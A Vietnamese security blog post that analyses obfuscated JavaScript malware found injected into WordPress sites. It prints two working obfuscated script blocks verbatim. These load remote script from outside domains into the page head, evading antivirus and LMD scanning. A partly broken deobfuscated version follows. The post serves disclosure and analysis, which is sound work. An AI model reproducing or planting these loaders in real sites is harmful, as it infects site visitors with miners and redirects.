Giải Mã Mã Độc Javascript Trên Wordpress - MTD SEC

MTD SEC

Chia Sẻ Để Thành Công

Home Top Ad

Post Top Ad

Thứ Sáu, 5 tháng 10, 2018

Home Security Giải Mã Mã Độc Javascript Trên Wordpress

Giải Mã Mã Độc Javascript Trên Wordpress


Trong thời gian ngần đây các website dùng wordpress bị nhiễm một loại mã độc đào coi và chuyển hướng bằng javascript và qua mặt hầu hết các firewall như LMD.. mã nguồn của nó bạn hãy xem đoạn code sau đây:





<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104,116,116,112,115,58,47,47,119,119,119,46,108,101,97,114,110,105,110,103,116,111,111,108,107,105,116,46,99,108,117,98,47,108,105,110,107,46,112,104,112);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));</script>




Đoạn mã trên bắt đầu bằng   "script language=javascript>var _0xfcc4" nó đã đánh bại toàn bộ firewall và biến nó thành phế vật khi quét mã độc 





Lý do khiến LMD vô dụng vì rất đơn giản LMD sử dụng kho database từ khóa để quét mã độc những cái ký tự mà mã độc này dùng thì được loại trừ vì nó không phải mã độc nếu chặn thì website cũng sẽ chết người dùng sẽ ném LMD vào thùng rác ngay và luôn





Javascript này cũng dễ dàng qua mặt được hầu hết các phần mềm antivirus kết quả mình đã test các bạn xem ở đây https://bit.ly/2Rpo2Vf





Sau đó mình đi giải mã đoạn code trên đoạn code này khá khó để giải mã ban đầu mình không hiểu cũng không biết nó mã hóa là gì ngồi loay hoay tìm hiểu một lúc mình đã giải mã được code của nó thành kết quả như bên dưới





<script language=javascript>
    var _0xfcc4 = ["fromCharCode", "GET", "open", "send", "responseText", "indexOf", "createElement", "type", "async", "id", "cdn789", "src", "appendChild", "getElementsByTagName", "script", "length"];
    var url = https://www.learningtoolkit.club/link.php);
    var get_text = function httpGet(_0x3bc1x4) {
        var _0x3bc1x5 = new XMLHttpRequest();
        _0x3bc1x5[_0xfcc4[2]](_0xfcc4[1], _0x3bc1x4, false);
        _0x3bc1x5[_0xfcc4[3]](null);
        return _0x3bc1x5[_0xfcc4[4]]
    };
    var text = get_text(url);
    if (text != String[_0xfcc4[0]](null) && text[_0xfcc4[5]](String[_0xfcc4[0]](https://)) > -1) {
        var a = function() {
            var _0x3bc1x8 = document[_0xfcc4[6]](String[_0xfcc4[0]](script));
            _0x3bc1x8[_0xfcc4[7]] = String[_0xfcc4[0]](text/javascript);
            _0x3bc1x8[_0xfcc4[8]] = true;
            _0x3bc1x8[_0xfcc4[9]] = _0xfcc4[10];
            _0x3bc1x8[_0xfcc4[11]] = text;
            document[_0xfcc4[13]](String[_0xfcc4[0]](head))[0][_0xfcc4[12]](_0x3bc1x8)
        };
        var scrpts = document[_0xfcc4[13]](_0xfcc4[14]);
        var n = true;
        for (var i = scrpts[_0xfcc4[15]]; i--;) {
            if (scrpts[i][_0xfcc4[9]] == _0xfcc4[10]) {
                n = false
            }
        };
        if (n == true) {
            a()
        }
    }
</script>
<script language=javascript>
var somestring=document.createElement('script'); somestring.type='text/javascript' ; somestring.async=true;somestring.src=e(https://examhome.net/stat.js?v=1.0.0.0.0); var alls=document.getElementsByTagName('script'); var nt3=true; for ( var i=alls.length; i--;) { if (alls[i].src.indexOf(examhome)>
    -1) {
        nt3 = false;
    }
    }
    if (nt3 == true) {
        document.getElementsByTagName("head")[0].appendChild(somestring);
    }
</script>




Qua đoạn mã trên chúng ra cũng đã rõ các thức mã độc này hoạt động cũng như code nguyên bản của chúng






Tags
Author Image

About Manh Tuong
Mạnh Tường là một người làm trong lĩnh vực an toàn thông tin tại việt nam đam mê chia sẻ nếu có nhắn nhủ hãy mail cho anh ấy qua: contact@manhtuong.net.

Người đăng: vào lúc
Nhãn:

Không có nhận xét nào:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)

Post Top Ad